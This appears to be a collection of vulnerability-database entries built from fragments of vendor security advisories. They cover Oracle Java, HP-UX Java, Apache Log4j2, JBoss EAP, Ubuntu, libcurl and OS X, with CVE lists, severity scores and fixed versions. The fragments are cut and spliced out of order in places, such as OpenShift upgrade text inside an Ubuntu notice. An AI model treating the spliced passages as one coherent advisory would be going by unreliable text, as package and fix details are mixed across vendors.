x86_64: java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.i386.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.i386.rpm x86_64: java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.x86_64.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.i686.rpm x86_64: java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux HPC Node Supplementary (v. 6): x86_64: java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.i686.rpm x86_64: java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.i686.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.i686.rpm x86_64: java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.x86_64.rpm java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-0401.html https://www.redhat.com/security/data/cve/CVE-2013-0402.html https://www.redhat.com/security/data/cve/CVE-2013-1488.html https://www.redhat.com/security/data/cve/CVE-2013-1491.html https://www.redhat.com/security/data/cve/CVE-2013-1518.html https://www.redhat.com/security/data/cve/CVE-2013-1537.html https://www.redhat.com/security/data/cve/CVE-2013-1540.html https://www.redhat.com/security/data/cve/CVE-2013-1557.html https://www.redhat.com/security/data/cve/CVE-2013-1558.html https://www.redhat.com/security/data/cve/CVE-2013-1561.html https://www.redhat.com/security/data/cve/CVE-2013-1563.html https://www.redhat.com/security/data/cve/CVE-2013-1564.html https://www.redhat.com/security/data/cve/CVE-2013-1569.html https://www.redhat.com/security/data/cve/CVE-2013-2383.html https://www.redhat.com/security/data/cve/CVE-2013-2384.html https://www.redhat.com/security/data/cve/CVE-2013-2394.html https://www.redhat.com/security/data/cve/CVE-2013-2414.html https://www.redhat.com/security/data/cve/CVE-2013-2415.html https://www.redhat.com/security/data/cve/CVE-2013-2416.html https://www.redhat.com/security/data/cve/CVE-2013-2417.html https://www.redhat.com/security/data/cve/CVE-2013-2418.html https://www.redhat.com/security/data/cve/CVE-2013-2419.html https://www.redhat.com/security/data/cve/CVE-2013-2420.html https://www.redhat.com/security/data/cve/CVE-2013-2421.html https://www.redhat.com/security/data/cve/CVE-2013-2422.html https://www.redhat.com/security/data/cve/CVE-2013-2423.html https://www.redhat.com/security/data/cve/CVE-2013-2424.html https://www.redhat.com/security/data/cve/CVE-2013-2425.html https://www.redhat.com/security/data/cve/CVE-2013-2426.html https://www.redhat.com/security/data/cve/CVE-2013-2427.html https://www.redhat.com/security/data/cve/CVE-2013-2428.html https://www.redhat.com/security/data/cve/CVE-2013-2429.html https://www.redhat.com/security/data/cve/CVE-2013-2430.html https://www.redhat.com/security/data/cve/CVE-2013-2431.html https://www.redhat.com/security/data/cve/CVE-2013-2432.html https://www.redhat.com/security/data/cve/CVE-2013-2433.html https://www.redhat.com/security/data/cve/CVE-2013-2434.html https://www.redhat.com/security/data/cve/CVE-2013-2435.html https://www.redhat.com/security/data/cve/CVE-2013-2436.html https://www.redhat.com/security/data/cve/CVE-2013-2438.html https://www.redhat.com/security/data/cve/CVE-2013-2439.html https://www.redhat.com/security/data/cve/CVE-2013-2440.html https://access.redhat.com/security/updates/classification/#critical http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFRcDsoXlSAg2UNWIIRAnQRAJkBOGnz8TW8LPB1Ur1msZYNqpYTowCfaOUs Up+dHVsSUEZZ+ySDcLQZIyU= =yeWV -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03874547 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03874547 Version: 1 HPSBUX02908 rev.1 - HP-UX Running Java6, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-31 Last Updated: 2013-07-31 Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in the Java Runtime Environment (JRE) and the Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other exploits. HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.19 and earlier. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2013-1500 (AV:L/AC:L/Au:N/C:P/I:P/A:N) 3.6 CVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2433 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2451 (AV:L/AC:H/Au:N/C:P/I:P/A:P) 3.7 CVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following Java version upgrade to resolve these vulnerabilities. The upgrade is available from the following location http://www.hp.com/java OS Version Release Version HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v6.0.20 or subsequent MANUAL ACTIONS: Yes - Update For Java v6.0 update to Java v6.0.20 or subsequent PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 =========== Jdk60.JDK60-COM Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W Jre60.JRE60-COM Jre60.JRE60-COM-DOC Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent HP-UX B.11.23 HP-UX B.11.31 =========== Jdk60.JDK60-COM Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 31 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
var-202112-1782 Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apache Log4j. Authentication is not required to exploit this vulnerability.The specific flaw exists within the StrSubstitutor class. The issue results from the lack of proper validation of user-supplied data, which can result in a resource exhaustion condition. An attacker can leverage this vulnerability to create a denial-of-service condition on the process. Log4j is an open source project of Apache. By using Log4j, the destination of log information transmission can be controlled to be console, file, GUI component, even socket server, NT event recorder, etc. Apache Log4j2 has a denial of service vulnerability. This vulnerability is due to the fact that Apache Log4j2 is configured with a non-default Pattern Layout scenario with Context Lookup (for example: $${ctx:loginId}), attackers can use this vulnerability to construct malicious data and execute denial of service without authorization attack, eventually causing the server to denial of service. Description: Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. For further information, refer to the release notes linked to in the References section. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update Advisory ID: RHSA-2022:1299-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://access.redhat.com/errata/RHSA-2022:1299 Issue date: 2022-04-11 CVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046 CVE-2021-45105 CVE-2022-23302 CVE-2022-23305 CVE-2022-23307 ===================================================================== 1. Summary: A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.4 Release Notes for information about the most significant bug fixes and enhancements included in this release. Security Fix(es): * log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender (CVE-2022-23305) * log4j: Unsafe deserialization flaw in Chainsaw log viewer (CVE-2022-23307) * log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104) * log4j-core: remote code execution via JDBC Appender (CVE-2021-44832) * log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046) * log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105) * log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink (CVE-2022-23302) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications. The References section of this erratum contains a download link (you must log in to download the update). 4. Bugs fixed (https://bugzilla.redhat.com/): 2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender 2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) 2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern 2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender 2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink 2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender 2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer 5. JIRA issues fixed (https://issues.jboss.org/): JBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7 JBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1 JBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034 JBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17) JBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console JBEAP-22839 - [GSS](7.4.z) Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001 JBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001 JBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002 JBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001 JBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001 JBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001 JBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002 JBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final JBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final JBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001 JBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final JBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001 JBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26 JBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001 JBEAP-23323 - [GSS](7.4.z) WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend JBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002 JBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001 JBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002 6. References: https://access.redhat.com/security/cve/CVE-2021-4104 https://access.redhat.com/security/cve/CVE-2021-44832 https://access.redhat.com/security/cve/CVE-2021-45046 https://access.redhat.com/security/cve/CVE-2021-45105 https://access.redhat.com/security/cve/CVE-2022-23302 https://access.redhat.com/security/cve/CVE-2022-23305 https://access.redhat.com/security/cve/CVE-2022-23307 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches&product=appplatform&version=7.4 https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/ 7. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYlRUotzjgjWX9erEAQgafQ/+Pl2HqHPYngUsGg6VFST32kJex0jLUnWl EOs4y/5rI4h51rF0Y1qnwT35sks3f+3fI+3IangMU6eV5DEs3CanejwB8o9ZbnXl ximutMjT1qswSmt5tVyMi2n9aXzP2OG/ERIx8lpNWsw6kd7DDdZYe572fVV7qZrV awPuoC0leEVuF1E3DeYP4L927k9W6eGiyjBm555KocrTiMiVeLIXyWJ3auHXPL8e FcBzKYJfAOS+CkjjJqJWOWr3Z/stDk4X7Iv5szVjywGVVMeHoaOOFRco/ILX3Lz7 FDtG0kkJPEKYlaMGBB3j8DSmlqhqzJzkXq9249+EYWDOFMAiSckUAXOemaIbqokB Oe7K1mbtAEdlgvyjqMFupJBAeCiwYFZHvvf1JulHoQXXSO4XDQDIS8DW28poVXad KSMkvGSjj1if4M6o3kdrK3axwPSDNIFV5GMmDsTOTLhgj+eCF9WMbBDA9SpyOOuh 0Y4/ICHVYDKgZCNFNW5kAY5BfGBN/4mHNfebuyHo/T7KhE/iauztOCQKsO/BNvmw C034eyuNHJ0jHN9rLMMSavj4EVBWp05fn0niv8PLFtOTx5hQ/HyHZI8mzK9Y6Nre UfxBSqE+XfkyFgGXM83FfvGAk4yuen+y0QmrEZwhd+pMT+GY7hgwrcM/I+RqQbgg RnIyvPszVZc= =07N4 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . JIRA issues fixed (https://issues.jboss.org/): LOG-1868 - The elasticsearch-im-xxx job failed when trying to start index management process for a non-existent(empty-named) index [openshift-logging-5.1] LOG-2022 - resourceVersion is overflowing type Integer causing ES rejection 6. ========================================================================= Ubuntu Security Notice USN-5222-1 January 11, 2022 apache-log4j2 vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 21.10 - Ubuntu 21.04 - Ubuntu 20.04 LTS - Ubuntu 18.04 LTS Summary: Several security issues were fixed in Apache Log4j 2. This issue only affected Ubuntu 18.04 LTS. (CVE-2021-45105) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 21.10: liblog4j2-java 2.17.1-0.21.10.1 Ubuntu 21.04: liblog4j2-java 2.17.1-0.21.04.1 Ubuntu 20.04 LTS: liblog4j2-java 2.17.1-0.20.04.1 Ubuntu 18.04 LTS: liblog4j2-java 2.12.4-0ubuntu0.1 In general, a standard system update will make all the necessary changes. Solution: For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html 4
var-201107-0125 The Curl_input_negotiate function in http_negotiate.c in libcurl 7.10.6 through 7.21.6, as used in curl and other products, always performs credential delegation during GSSAPI authentication, which allows remote servers to impersonate clients via GSSAPI requests. cURL/libcURL is prone to a vulnerability that may allow attackers to spoof clients' security credentials. This issue affects cURL/libcURL versions 7.10.6 through 7.21.6. Libcurl is a free and open source client url transfer library that supports FTP, FTPS, TFTP, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. This is obviously a very sensitive operation, which should only be done when the user explicitly so directs. For the oldstable distribution (lenny), this problem has been fixed in version 7.18.2-8lenny5. For the stable distribution (squeeze), this problem has been fixed in version 7.21.0-2. For the testing distribution (wheezy), this problem has been fixed in version 7.21.6-2. For the unstable distribution (sid), this problem has been fixed in version 7.21.6-2. We recommend that you upgrade your curl packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk4OzaUACgkQNxpp46476aoSKACfX1R3mmZoiUa0JRSoPe2BtJ8O BdMAn0AgK41VMLR0mOuU0fN2ZmMcO6+1 =taf+ -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001 OS X Lion v10.7.3 and Security Update 2012-001 is now available and addresses the following: Address Book Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker in a privileged network position may intercept CardDAV data Description: Address Book supports Secure Sockets Layer (SSL) for accessing CardDAV. A downgrade issue caused Address Book to attempt an unencrypted connection if an encrypted connection failed. An attacker in a privileged network position could abuse this behavior to intercept CardDAV data. This issue is addressed by not downgrading to an unencrypted connection without user approval. CVE-ID CVE-2011-3444 : Bernard Desruisseaux of Oracle Corporation Apache Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in Apache Description: Apache is updated to version 2.2.21 to address several vulnerabilities, the most serious of which may lead to a denial of service. Further information is available via the Apache web site at http://httpd.apache.org/ CVE-ID CVE-2011-3348 Apache Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. Apache disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by providing a configuration parameter to control the countermeasure and enabling it by default. CVE-ID CVE-2011-3389 CFNetwork Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in CFNetwork's handling of malformed URLs. When accessing a maliciously crafted URL, CFNetwork could send the request to an incorrect origin server. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3246 : Erling Ellingsen of Facebook CFNetwork Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in CFNetwork's handling of malformed URLs. When accessing a maliciously crafted URL, CFNetwork could send unexpected request headers. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3447 : Erling Ellingsen of Facebook ColorSync Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of images with an embedded ColorSync profile, which may lead to a heap buffer overflow. This issue does not affect OS X Lion systems. CVE-ID CVE-2011-0200 : binaryproof working with TippingPoint's Zero Day Initiative 